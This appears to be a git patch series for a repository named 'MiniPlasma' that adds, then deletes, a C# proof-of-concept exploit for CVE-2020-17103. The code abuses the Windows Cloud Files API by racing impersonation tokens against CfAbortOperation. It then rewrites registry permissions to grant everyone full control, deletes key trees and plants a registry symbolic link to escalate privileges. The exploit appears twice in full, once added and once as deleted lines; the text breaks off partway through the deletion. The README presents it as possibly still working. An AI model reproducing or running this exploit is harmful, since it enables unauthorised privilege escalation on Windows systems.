From 17a2a44ccfb3266b44143af747cab9b295d3ed9d Mon Sep 17 00:00:00 2001
From: Nightmare-Eclipse <terrainrepublic968@gmail.com>
Date: Thu, 14 May 2026 22:32:22 +0200
Subject: [PATCH 1/3] Initial commit

---
 LICENSE   | 21 +++++++++++++++++++++
 README.md |  2 ++
 2 files changed, 23 insertions(+)
 create mode 100644 LICENSE
 create mode 100644 README.md

diff --git a/LICENSE b/LICENSE
new file mode 100644
index 0000000..c30f3fd
--- /dev/null
+++ b/LICENSE
@@ -0,0 +1,21 @@
+MIT License
+
+Copyright (c) 2026 Nightmare-Eclipse
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.
diff --git a/README.md b/README.md
new file mode 100644
index 0000000..140f3a8
--- /dev/null
+++ b/README.md
@@ -0,0 +1,2 @@
+# MiniPlasma
+CVE-2020-17103 supposedly still works 

From b73f93814b0f5b3e48e9c70990208da79466e77c Mon Sep 17 00:00:00 2001
From: Nightmare-Eclipse <terrainrepublic968@gmail.com>
Date: Thu, 14 May 2026 22:33:50 +0200
Subject: [PATCH 2/3] Add files via upload

---
 ...PoC_AbortHydration_ArbitraryRegKey_EoP.sln |  25 ++
 .../App.config                                |   6 +
 ..._AbortHydration_ArbitraryRegKey_EoP.csproj |  59 ++++
 .../Program.cs                                | 267 ++++++++++++++++++
 .../Properties/AssemblyInfo.cs                |  36 +++
 .../packages.config                           |   4 +
 6 files changed, 397 insertions(+)
 create mode 100644 src/PoC_AbortHydration_ArbitraryRegKey_EoP.sln
 create mode 100644 src/PoC_AbortHydration_ArbitraryRegKey_EoP/App.config
 create mode 100644 src/PoC_AbortHydration_ArbitraryRegKey_EoP/PoC_AbortHydration_ArbitraryRegKey_EoP.csproj
 create mode 100644 src/PoC_AbortHydration_ArbitraryRegKey_EoP/Program.cs
 create mode 100644 src/PoC_AbortHydration_ArbitraryRegKey_EoP/Properties/AssemblyInfo.cs
 create mode 100644 src/PoC_AbortHydration_ArbitraryRegKey_EoP/packages.config

diff --git a/src/PoC_AbortHydration_ArbitraryRegKey_EoP.sln b/src/PoC_AbortHydration_ArbitraryRegKey_EoP.sln
new file mode 100644
index 0000000..e387198
--- /dev/null
+++ b/src/PoC_AbortHydration_ArbitraryRegKey_EoP.sln
@@ -0,0 +1,25 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 16
+VisualStudioVersion = 16.0.30413.136
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "PoC_AbortHydration_ArbitraryRegKey_EoP", "PoC_AbortHydration_ArbitraryRegKey_EoP\PoC_AbortHydration_ArbitraryRegKey_EoP.csproj", "{352F6DD7-9B05-4896-9E7D-2EFA36EAC6E3}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Any CPU = Debug|Any CPU
+		Release|Any CPU = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{352F6DD7-9B05-4896-9E7D-2EFA36EAC6E3}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{352F6DD7-9B05-4896-9E7D-2EFA36EAC6E3}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{352F6DD7-9B05-4896-9E7D-2EFA36EAC6E3}.Release|Any CPU.ActiveCfg = Release|Any CPU
+		{352F6DD7-9B05-4896-9E7D-2EFA36EAC6E3}.Release|Any CPU.Build.0 = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+	GlobalSection(ExtensibilityGlobals) = postSolution
+		SolutionGuid = {AC46CFC5-1E96-44EF-8DC8-8D76B107B781}
+	EndGlobalSection
+EndGlobal
diff --git a/src/PoC_AbortHydration_ArbitraryRegKey_EoP/App.config b/src/PoC_AbortHydration_ArbitraryRegKey_EoP/App.config
new file mode 100644
index 0000000..5754728
--- /dev/null
+++ b/src/PoC_AbortHydration_ArbitraryRegKey_EoP/App.config
@@ -0,0 +1,6 @@
+<?xml version="1.0" encoding="utf-8" ?>
+<configuration>
+    <startup> 
+        <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2" />
+    </startup>
+</configuration>
\ No newline at end of file
diff --git a/src/PoC_AbortHydration_ArbitraryRegKey_EoP/PoC_AbortHydration_ArbitraryRegKey_EoP.csproj b/src/PoC_AbortHydration_ArbitraryRegKey_EoP/PoC_AbortHydration_ArbitraryRegKey_EoP.csproj
new file mode 100644
index 0000000..82dafa4
--- /dev/null
+++ b/src/PoC_AbortHydration_ArbitraryRegKey_EoP/PoC_AbortHydration_ArbitraryRegKey_EoP.csproj
@@ -0,0 +1,59 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
+  <PropertyGroup>
+    <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
+    <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
+    <ProjectGuid>{352F6DD7-9B05-4896-9E7D-2EFA36EAC6E3}</ProjectGuid>
+    <OutputType>Exe</OutputType>
+    <RootNamespace>PoC_AbortHydration_ArbitraryRegKey_EoP</RootNamespace>
+    <AssemblyName>PoC_AbortHydration_ArbitraryRegKey_EoP</AssemblyName>
+    <TargetFrameworkVersion>v4.7.2</TargetFrameworkVersion>
+    <FileAlignment>512</FileAlignment>
+    <AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
+    <Deterministic>true</Deterministic>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugSymbols>true</DebugSymbols>
+    <DebugType>full</DebugType>
+    <Optimize>false</Optimize>
+    <OutputPath>bin\Debug\</OutputPath>
+    <DefineConstants>DEBUG;TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+    <Prefer32Bit>false</Prefer32Bit>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugType>pdbonly</DebugType>
+    <Optimize>true</Optimize>
+    <OutputPath>bin\Release\</OutputPath>
+    <DefineConstants>TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+    <Prefer32Bit>false</Prefer32Bit>
+  </PropertyGroup>
+  <ItemGroup>
+    <Reference Include="NtApiDotNet, Version=1.0.0.0, Culture=neutral, processorArchitecture=MSIL">
+      <HintPath>..\packages\NtApiDotNet.1.1.28\lib\net45\NtApiDotNet.dll</HintPath>
+    </Reference>
+    <Reference Include="System" />
+    <Reference Include="System.Core" />
+    <Reference Include="System.Xml.Linq" />
+    <Reference Include="System.Data.DataSetExtensions" />
+    <Reference Include="Microsoft.CSharp" />
+    <Reference Include="System.Data" />
+    <Reference Include="System.Net.Http" />
+    <Reference Include="System.Xml" />
+  </ItemGroup>
+  <ItemGroup>
+    <Compile Include="Program.cs" />
+    <Compile Include="Properties\AssemblyInfo.cs" />
+  </ItemGroup>
+  <ItemGroup>
+    <None Include="App.config" />
+    <None Include="packages.config" />
+  </ItemGroup>
+  <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
+</Project>
\ No newline at end of file
diff --git a/src/PoC_AbortHydration_ArbitraryRegKey_EoP/Program.cs b/src/PoC_AbortHydration_ArbitraryRegKey_EoP/Program.cs
new file mode 100644
index 0000000..9429502
--- /dev/null
+++ b/src/PoC_AbortHydration_ArbitraryRegKey_EoP/Program.cs
@@ -0,0 +1,267 @@
+using NtApiDotNet;
+using NtApiDotNet.Win32;
+using System;
+using System.Runtime.InteropServices;
+using System.Threading;
+
+namespace PoC_AbortHydration_ArbitraryRegKey_EoP
+{
+    static class Program
+    {
+        static NtKey OpenKey(NtKey root, string path, KeyAccessRights desired_access)
+        {
+            Console.WriteLine("Opening for {0}", desired_access);
+            using (var obja = new ObjectAttributes(path, AttributeFlags.OpenLink, root))
+            {
+                using (var key = NtKey.Open(obja, desired_access, KeyCreateOptions.NonVolatile, false))
+                {
+                    if (key.IsSuccess)
+                        return key.Result.Duplicate();
+                }
+
+                using (var imp = NtThread.Current.ImpersonateAnonymousToken())
+                {
+                    return NtKey.Open(obja, desired_access, KeyCreateOptions.NonVolatile);
+                }
+            }
+        }
+
+        static void SetSecurityDescriptor(NtKey key, SecurityInformation info)
+        {
+            var sd = new SecurityDescriptor("D:(A;OICIIO;GA;;;WD)(A;OICIIO;GA;;;AN)(A;;GA;;;WD)(A;;GA;;;AN)S:(ML;OICI;NW;;;S-1-16-0)");
+            key.SetSecurityDescriptor(sd, info);
+        }
+
+        static void ForceKeyDeleteKey(NtKey root, string name)
+        {
+            Console.WriteLine(@"Deleting {0}\{1}", root.FullPath, name);
+            using (var key = OpenKey(root, name, KeyAccessRights.WriteDac))
+            {
+                Console.WriteLine("Opened for WriteDac");
+                SetSecurityDescriptor(key, SecurityInformation.Dacl);
+            }
+
+            using (var key = OpenKey(root, name, KeyAccessRights.WriteOwner))
+            {
+                Console.WriteLine("Opened for WriteOwner");
+                SetSecurityDescriptor(key, SecurityInformation.Label);
+            }
+
+            using (var new_key = OpenKey(root, name, KeyAccessRights.Delete | KeyAccessRights.EnumerateSubKeys))
+            {
+                Console.WriteLine("Opened for enumerate.");
+                DeleteRegistryTree(new_key);
+                new_key.Delete();
+            }
+        }
+
+        static void DeleteRegistryTree(NtKey root)
+        {
+            foreach (var name in root.QueryKeys())
+            {
+                ForceKeyDeleteKey(root, name);
+            }
+        }
+
+        [Flags]
+        enum AbortHydrationFlags
+        {
+            None = 0,
+            Unblock = 1,
+            Block = 2,
+        }
+
+        [DllImport("cldapi.dll", CharSet = CharSet.Unicode)]
+        static extern int CfAbortOperation(int pid, IntPtr unknown, AbortHydrationFlags flags);
+
+        [StructLayout(LayoutKind.Sequential)]
+        struct CF_PLATFORM_INFO
+        {
+            public int BuildNumber;
+            public int RevisionNumber;
+            public int IntegrationNumber;
+        }
+
+        [DllImport("cldapi.dll", CharSet = CharSet.Unicode)]
+        static extern int CfGetPlatformInfo(
+          out CF_PLATFORM_INFO PlatformVersion
+        );
+
+        static void ForceTokenThread(object obj)
+        {
+            try
+            {
+                using (var thread = (NtThread)obj)
+                {
+                    Console.WriteLine("In force token thread {0}", thread);
+                    using (var token = TokenUtils.GetAnonymousToken())
+                    {
+                        while (true)
+                        {
+                            thread.SetImpersonationToken(token);
+                            thread.SetImpersonationToken(null);
+                        }
+                    }
+                }
+            }
+            catch(ThreadAbortException)
+            {
+                return;
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine(ex);
+            }
+        }
+
+        const string ROOT_KEY = @"\Registry\User\.DEFAULT\Software\Policies\Microsoft";
+        static string CLOUD_FILES = $@"{ROOT_KEY}\CloudFiles";
+        static string BLOCKED_APPS = $@"{CLOUD_FILES}\BlockedApps";
+        const string TARGET_KEY = @"\Registry\User\.DEFAULT\DEMODEMO";
+
+        static void CheckKeyThread(object root_key)
+        {
+            string path = (bool)root_key ? ROOT_KEY : @"\Registry\User\.DEFAULT";
+            try
+            {
+                using (var key = NtKey.Open(path, null, KeyAccessRights.MaximumAllowed))
+                {
+                    while (true)
+                    {
+                        if (key.NotifyChange(NotifyCompletionFilter.Name, true) == NtStatus.STATUS_NOTIFY_ENUM_DIR)
+                        {
+                            Console.WriteLine("Change detected.");
+                            Environment.Exit(0);
+                            break;
+                        }
+                    }
+                }
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine(ex);
+            }
+        }
+
+        static int Check(this int hr)
+        {
+            if (hr < 0)
+                Marshal.ThrowExceptionForHR(hr);
+            return hr;
+        }
+
+        const int MAX_STAGE = 4;
+
+        static void Stage0()
+        {
+            for (int i = 1; i < MAX_STAGE; ++i)
+            {
+                Win32ProcessConfig config = new Win32ProcessConfig
+                {
+                    CommandLine = $"run {i}",
+                    ApplicationName = typeof(Program).Assembly.Location,
+                    TerminateOnDispose = true
+                };
+
+                using (var p = Win32Process.CreateProcess(config))
+                {
+                    if (p.Process.Wait(10) != NtStatus.STATUS_SUCCESS)
+                    {
+                        throw new ArgumentException($"Failed to run stage {i}");
+                    }
+                }
+            }
+        }
+
+        static void Stage1(bool root_key)
+        {
+            Thread check_key_th = new Thread(CheckKeyThread);
+            check_key_th.IsBackground = true;
+            check_key_th.Start(root_key);
+            Thread.Sleep(1000);
+
+            var th = NtThread.OpenCurrent();
+            var anon_thread = new Thread(ForceTokenThread)
+            {
+                IsBackground = true
+            };
+            anon_thread.Start(th);
+
+            while (true)
+            {
+                CfAbortOperation(NtProcess.Current.ProcessId,
+                    IntPtr.Zero, AbortHydrationFlags.Block);
+            }
+        }
+
+        static void Stage2()
+        {
+            using (var key = OpenKey(null, CLOUD_FILES, KeyAccessRights.WriteDac | KeyAccessRights.WriteOwner | KeyAccessRights.EnumerateSubKeys))
+            {
+                SetSecurityDescriptor(key, SecurityInformation.Dacl | SecurityInformation.Label);
+                DeleteRegistryTree(key);
+            }
+
+            NtKey.CreateSymbolicLink(BLOCKED_APPS, null, TARGET_KEY);
+            Stage1(false);
+        }
+
+        static void Stage3()
+        {
+            using (var key = OpenKey(null, BLOCKED_APPS, KeyAccessRights.Delete))
+            {
+                Console.WriteLine("Cleaning up link {0}", key.FullPath);
+                key.Delete();
+            }
+
+            using (var key = OpenKey(null, TARGET_KEY, KeyAccessRights.WriteDac | KeyAccessRights.WriteOwner))
+            {
+                SetSecurityDescriptor(key, SecurityInformation.Dacl | SecurityInformation.Label);
+            }
+        }
+
+        static void Main(string[] args)
+        {
+            try
+            {
+                CfGetPlatformInfo(out CF_PLATFORM_INFO _).Check();
+
+                if (args.Length <= 1)
+                {
+                    int stage = args.Length > 0 ? int.Parse(args[0]) : 0;
+                    switch (stage)
+                    {
+                        case 0:
+                            Stage0();
+                            break;
+                        case 1:
+                            Stage1(true);
+                            break;
+                        case 2:
+                            Stage2();
+                            break;
+                        case 3:
+                            Stage3();
+                            break;
+                        default:
+                            throw new ArgumentException("Erm?");
+                    }
+                }
+                else
+                {
+                    using (var token = TokenUtils.GetLogonUserToken(args[0], "", args[1], SecurityLogonType.Network, null))
+                    {
+                        using (var imp = token.Impersonate())
+                        {
+                            CfAbortOperation(NtProcess.Current.ProcessId, IntPtr.Zero, AbortHydrationFlags.Block).Check();
+                        }
+                    }
+                }
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine(ex);
+            }
+        }
+    }
+}
diff --git a/src/PoC_AbortHydration_ArbitraryRegKey_EoP/Properties/AssemblyInfo.cs b/src/PoC_AbortHydration_ArbitraryRegKey_EoP/Properties/AssemblyInfo.cs
new file mode 100644
index 0000000..6e2483f
--- /dev/null
+++ b/src/PoC_AbortHydration_ArbitraryRegKey_EoP/Properties/AssemblyInfo.cs
@@ -0,0 +1,36 @@
+using System.Reflection;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+// General Information about an assembly is controlled through the following
+// set of attributes. Change these attribute values to modify the information
+// associated with an assembly.
+[assembly: AssemblyTitle("PoC_AbortHydration_ArbitraryRegKey_EoP")]
+[assembly: AssemblyDescription("")]
+[assembly: AssemblyConfiguration("")]
+[assembly: AssemblyCompany("")]
+[assembly: AssemblyProduct("PoC_AbortHydration_ArbitraryRegKey_EoP")]
+[assembly: AssemblyCopyright("Copyright ©  2020")]
+[assembly: AssemblyTrademark("")]
+[assembly: AssemblyCulture("")]
+
+// Setting ComVisible to false makes the types in this assembly not visible
+// to COM components.  If you need to access a type in this assembly from
+// COM, set the ComVisible attribute to true on that type.
+[assembly: ComVisible(false)]
+
+// The following GUID is for the ID of the typelib if this project is exposed to COM
+[assembly: Guid("352f6dd7-9b05-4896-9e7d-2efa36eac6e3")]
+
+// Version information for an assembly consists of the following four values:
+//
+//      Major Version
+//      Minor Version
+//      Build Number
+//      Revision
+//
+// You can specify all the values or you can default the Build and Revision Numbers
+// by using the '*' as shown below:
+// [assembly: AssemblyVersion("1.0.*")]
+[assembly: AssemblyVersion("1.0.0.0")]
+[assembly: AssemblyFileVersion("1.0.0.0")]
diff --git a/src/PoC_AbortHydration_ArbitraryRegKey_EoP/packages.config b/src/PoC_AbortHydration_ArbitraryRegKey_EoP/packages.config
new file mode 100644
index 0000000..f78d31a
--- /dev/null
+++ b/src/PoC_AbortHydration_ArbitraryRegKey_EoP/packages.config
@@ -0,0 +1,4 @@
+<?xml version="1.0" encoding="utf-8"?>
+<packages>
+  <package id="NtApiDotNet" version="1.1.28" targetFramework="net472" />
+</packages>
\ No newline at end of file

From 3894dd599dbc4289fc4074646268f1c1194c3fae Mon Sep 17 00:00:00 2001
From: Nightmare-Eclipse <terrainrepublic968@gmail.com>
Date: Sat, 16 May 2026 06:30:59 +0200
Subject: [PATCH 3/3] Delete src directory

---
 ...PoC_AbortHydration_ArbitraryRegKey_EoP.sln |  25 --
 .../App.config                                |   6 -
 ..._AbortHydration_ArbitraryRegKey_EoP.csproj |  59 ----
 .../Program.cs                                | 267 ------------------
 .../Properties/AssemblyInfo.cs                |  36 ---
 .../packages.config                           |   4 -
 6 files changed, 397 deletions(-)
 delete mode 100644 src/PoC_AbortHydration_ArbitraryRegKey_EoP.sln
 delete mode 100644 src/PoC_AbortHydration_ArbitraryRegKey_EoP/App.config
 delete mode 100644 src/PoC_AbortHydration_ArbitraryRegKey_EoP/PoC_AbortHydration_ArbitraryRegKey_EoP.csproj
 delete mode 100644 src/PoC_AbortHydration_ArbitraryRegKey_EoP/Program.cs
 delete mode 100644 src/PoC_AbortHydration_ArbitraryRegKey_EoP/Properties/AssemblyInfo.cs
 delete mode 100644 src/PoC_AbortHydration_ArbitraryRegKey_EoP/packages.config

diff --git a/src/PoC_AbortHydration_ArbitraryRegKey_EoP.sln b/src/PoC_AbortHydration_ArbitraryRegKey_EoP.sln
deleted file mode 100644
index e387198..0000000
--- a/src/PoC_AbortHydration_ArbitraryRegKey_EoP.sln
+++ /dev/null
@@ -1,25 +0,0 @@
-
-Microsoft Visual Studio Solution File, Format Version 12.00
-# Visual Studio Version 16
-VisualStudioVersion = 16.0.30413.136
-MinimumVisualStudioVersion = 10.0.40219.1
-Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "PoC_AbortHydration_ArbitraryRegKey_EoP", "PoC_AbortHydration_ArbitraryRegKey_EoP\PoC_AbortHydration_ArbitraryRegKey_EoP.csproj", "{352F6DD7-9B05-4896-9E7D-2EFA36EAC6E3}"
-EndProject
-Global
-	GlobalSection(SolutionConfigurationPlatforms) = preSolution
-		Debug|Any CPU = Debug|Any CPU
-		Release|Any CPU = Release|Any CPU
-	EndGlobalSection
-	GlobalSection(ProjectConfigurationPlatforms) = postSolution
-		{352F6DD7-9B05-4896-9E7D-2EFA36EAC6E3}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
-		{352F6DD7-9B05-4896-9E7D-2EFA36EAC6E3}.Debug|Any CPU.Build.0 = Debug|Any CPU
-		{352F6DD7-9B05-4896-9E7D-2EFA36EAC6E3}.Release|Any CPU.ActiveCfg = Release|Any CPU
-		{352F6DD7-9B05-4896-9E7D-2EFA36EAC6E3}.Release|Any CPU.Build.0 = Release|Any CPU
-	EndGlobalSection
-	GlobalSection(SolutionProperties) = preSolution
-		HideSolutionNode = FALSE
-	EndGlobalSection
-	GlobalSection(ExtensibilityGlobals) = postSolution
-		SolutionGuid = {AC46CFC5-1E96-44EF-8DC8-8D76B107B781}
-	EndGlobalSection
-EndGlobal
diff --git a/src/PoC_AbortHydration_ArbitraryRegKey_EoP/App.config b/src/PoC_AbortHydration_ArbitraryRegKey_EoP/App.config
deleted file mode 100644
index 5754728..0000000
--- a/src/PoC_AbortHydration_ArbitraryRegKey_EoP/App.config
+++ /dev/null
@@ -1,6 +0,0 @@
-<?xml version="1.0" encoding="utf-8" ?>
-<configuration>
-    <startup> 
-        <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2" />
-    </startup>
-</configuration>
\ No newline at end of file
diff --git a/src/PoC_AbortHydration_ArbitraryRegKey_EoP/PoC_AbortHydration_ArbitraryRegKey_EoP.csproj b/src/PoC_AbortHydration_ArbitraryRegKey_EoP/PoC_AbortHydration_ArbitraryRegKey_EoP.csproj
deleted file mode 100644
index 82dafa4..0000000
--- a/src/PoC_AbortHydration_ArbitraryRegKey_EoP/PoC_AbortHydration_ArbitraryRegKey_EoP.csproj
+++ /dev/null
@@ -1,59 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
-  <PropertyGroup>
-    <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
-    <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
-    <ProjectGuid>{352F6DD7-9B05-4896-9E7D-2EFA36EAC6E3}</ProjectGuid>
-    <OutputType>Exe</OutputType>
-    <RootNamespace>PoC_AbortHydration_ArbitraryRegKey_EoP</RootNamespace>
-    <AssemblyName>PoC_AbortHydration_ArbitraryRegKey_EoP</AssemblyName>
-    <TargetFrameworkVersion>v4.7.2</TargetFrameworkVersion>
-    <FileAlignment>512</FileAlignment>
-    <AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
-    <Deterministic>true</Deterministic>
-  </PropertyGroup>
-  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
-    <PlatformTarget>AnyCPU</PlatformTarget>
-    <DebugSymbols>true</DebugSymbols>
-    <DebugType>full</DebugType>
-    <Optimize>false</Optimize>
-    <OutputPath>bin\Debug\</OutputPath>
-    <DefineConstants>DEBUG;TRACE</DefineConstants>
-    <ErrorReport>prompt</ErrorReport>
-    <WarningLevel>4</WarningLevel>
-    <Prefer32Bit>false</Prefer32Bit>
-  </PropertyGroup>
-  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
-    <PlatformTarget>AnyCPU</PlatformTarget>
-    <DebugType>pdbonly</DebugType>
-    <Optimize>true</Optimize>
-    <OutputPath>bin\Release\</OutputPath>
-    <DefineConstants>TRACE</DefineConstants>
-    <ErrorReport>prompt</ErrorReport>
-    <WarningLevel>4</WarningLevel>
-    <Prefer32Bit>false</Prefer32Bit>
-  </PropertyGroup>
-  <ItemGroup>
-    <Reference Include="NtApiDotNet, Version=1.0.0.0, Culture=neutral, processorArchitecture=MSIL">
-      <HintPath>..\packages\NtApiDotNet.1.1.28\lib\net45\NtApiDotNet.dll</HintPath>
-    </Reference>
-    <Reference Include="System" />
-    <Reference Include="System.Core" />
-    <Reference Include="System.Xml.Linq" />
-    <Reference Include="System.Data.DataSetExtensions" />
-    <Reference Include="Microsoft.CSharp" />
-    <Reference Include="System.Data" />
-    <Reference Include="System.Net.Http" />
-    <Reference Include="System.Xml" />
-  </ItemGroup>
-  <ItemGroup>
-    <Compile Include="Program.cs" />
-    <Compile Include="Properties\AssemblyInfo.cs" />
-  </ItemGroup>
-  <ItemGroup>
-    <None Include="App.config" />
-    <None Include="packages.config" />
-  </ItemGroup>
-  <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
-</Project>
\ No newline at end of file
diff --git a/src/PoC_AbortHydration_ArbitraryRegKey_EoP/Program.cs b/src/PoC_AbortHydration_ArbitraryRegKey_EoP/Program.cs
deleted file mode 100644
index 9429502..0000000
--- a/src/PoC_AbortHydration_ArbitraryRegKey_EoP/Program.cs
+++ /dev/null
@@ -1,267 +0,0 @@
-using NtApiDotNet;
-using NtApiDotNet.Win32;
-using System;
-using System.Runtime.InteropServices;
-using System.Threading;
-
-namespace PoC_AbortHydration_ArbitraryRegKey_EoP
-{
-    static class Program
-    {
-        static NtKey OpenKey(NtKey root, string path, KeyAccessRights desired_access)
-        {
-            Console.WriteLine("Opening for {0}", desired_access);
-            using (var obja = new ObjectAttributes(path, AttributeFlags.OpenLink, root))
-            {
-                using (var key = NtKey.Open(obja, desired_access, KeyCreateOptions.NonVolatile, false))
-                {
-                    if (key.IsSuccess)
-                        return key.Result.Duplicate();
-                }
-
-                using (var imp = NtThread.Current.ImpersonateAnonymousToken())
-                {
-                    return NtKey.Open(obja, desired_access, KeyCreateOptions.NonVolatile);
-                }
-            }
-        }
-
-        static void SetSecurityDescriptor(NtKey key, SecurityInformation info)
-        {
-            var sd = new SecurityDescriptor("D:(A;OICIIO;GA;;;WD)(A;OICIIO;GA;;;AN)(A;;GA;;;WD)(A;;GA;;;AN)S:(ML;OICI;NW;;;S-1-16-0)");
-            key.SetSecurityDescriptor(sd, info);
-        }
-
-        static void ForceKeyDeleteKey(NtKey root, string name)
-        {
-            Console.WriteLine(@"Deleting {0}\{1}", root.FullPath, name);
-            using (var key = OpenKey(root, name, KeyAccessRights.WriteDac))
-            {
-                Console.WriteLine("Opened for WriteDac");
-                SetSecurityDescriptor(key, SecurityInformation.Dacl);
-            }
-
-            using (var key = OpenKey(root, name, KeyAccessRights.WriteOwner))
-            {
-                Console.WriteLine("Opened for WriteOwner");
-                SetSecurityDescriptor(key, SecurityInformation.Label);
-            }
-
-            using (var new_key = OpenKey(root, name, KeyAccessRights.Delete | KeyAccessRights.EnumerateSubKeys))
-            {
-                Console.WriteLine("Opened for enumerate.");
-                DeleteRegistryTree(new_key);
-                new_key.Delete();
-            }
-        }
-
-        static void DeleteRegistryTree(NtKey root)
-        {
-            foreach (var name in root.QueryKeys())
-            {
-                ForceKeyDeleteKey(root, name);
-            }
-        }
-
-        [Flags]
-        enum AbortHydrationFlags
-        {
-            None = 0,
-            Unblock = 1,
-            Block = 2,
-        }
-
-        [DllImport("cldapi.dll", CharSet = CharSet.Unicode)]
-        static extern int CfAbortOperation(int pid, IntPtr unknown, AbortHydrationFlags flags);
-
-        [StructLayout(LayoutKind.Sequential)]
-        struct CF_PLATFORM_INFO
-        {
-            public int BuildNumber;
-            public int RevisionNumber;
-            public int IntegrationNumber;
-        }
-
-        [DllImport("cldapi.dll", CharSet = CharSet.Unicode)]
-        static extern int CfGetPlatformInfo(
-          out CF_PLATFORM_INFO PlatformVersion
-        );
-
-        static void ForceTokenThread(object obj)
-        {
-            try
-            {
-                using (var thread = (NtThread)obj)
-                {
-                    Console.WriteLine("In force token thread {0}", thread);
-                    using (var token = TokenUtils.GetAnonymousToken())
-                    {
-                        while (true)
-                        {
-                            thread.SetImpersonationToken(token);
-                            thread.SetImpersonationToken(null);
-                        }
-                    }
-                }
-            }
-            catch(ThreadAbortException)
-            {
-                return;
-            }
-            catch (Exception ex)
-            {
-                Console.WriteLine(ex);
-            }
-        }
-
-        const string ROOT_KEY = @"\Registry\User\.DEFAULT\Software\Policies\Microsoft";
-        static string CLOUD_FILES = $@"{ROOT_KEY}\CloudFiles";
-        static string BLOCKED_APPS = $@"{CLOUD_FILES}\BlockedApps";
-        const string TARGET_KEY = @"\Registry\User\.DEFAULT\DEMODEMO";
-
-        static void CheckKeyThread(object root_key)
-        {
-            string path = (bool)root_key ? ROOT_KEY : @"\Registry\User\.DEFAULT";
-            try
-            {
-                using (var key = NtKey.Open(path, null, KeyAccessRights.MaximumAllowed))
-                {
-                    while (true)
-                    {
-                        if (key.NotifyChange(NotifyCompletionFilter.Name, true) == NtStatus.STATUS_NOTIFY_ENUM_DIR)
-                        {
-                            Console.WriteLine("Change detected.");
-                            Environment.Exit(0);
-                            break;
-                        }
-                    }
-                }
-            }
-            catch (Exception ex)
-            {
-                Console.WriteLine(ex);
-            }
-        }
-
-        static int Check(this int hr)
-        {
-            if (hr < 0)
-                Marshal.ThrowExceptionForHR(hr);
-            return hr;
-        }
-
-        const int MAX_STAGE = 4;
-
-        static void Stage0()
-        {
-            for (int i = 1; i < MAX_STAGE; ++i)
-            {
-                Win32ProcessConfig config = new Win32ProcessConfig
-                {
-                    CommandLine = $"run {i}",
-                    ApplicationName = typeof(Program).Assembly.Location,
-                    TerminateOnDispose = true
-                };
-
-                using (var p = Win32Process.CreateProcess(config))
-                {
-                    if (p.Process.Wait(10) != NtStatus.STATUS_SUCCESS)
-                    {
-                        throw new ArgumentException($"Failed to run stage {i}");
-                    }
-                }
-            }
-        }
-
-        static void Stage1(bool root_key)
